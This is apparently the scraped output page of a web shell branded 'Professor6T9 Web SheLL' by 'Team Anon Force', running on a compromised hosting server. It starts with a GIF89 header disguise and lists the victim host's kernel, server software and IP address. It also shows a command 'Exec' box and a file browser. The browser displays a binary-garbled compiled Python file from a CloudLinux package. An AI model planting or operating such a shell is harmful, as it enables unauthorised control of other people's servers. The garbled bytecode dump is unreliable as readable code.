GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib64
/
python3.11
/
site-packages
/
requirements_detector
/
__pycache__
[ HOME ]
Exec
Submit
File Name : requirement.cpython-311.pyc
� � h� � �v � d Z ddlZddlZddlmZ ddlmZ ddlmZ ddl m Z d� Zd� Zd � Z G d � d� � ZdS )aF This module represents the various types of requirement that can be specified for a project. It is somewhat redundant to re-implement here as we could use `pip.req.InstallRequirement`, but that would require depending on pip which is not easy to do since it will usually be installed by the user at a specific version. Additionally, the pip implementation has a lot of extra features that we don't need - we don't expect relative file paths to exist, for example. Note that the parsing here is also intentionally more lenient - it is not our job to validate the requirements list. � N)�Path)�Optional)�parse)�Requirementc �R � t j j | v p| � d� � S )N�.)�os�path�sep� startswith)�reqs �r/builddir/build/BUILD/cloudlinux-venv-1.0.8/venv/lib/python3.11/site-packages/requirements_detector/requirement.py�_is_filepathr s"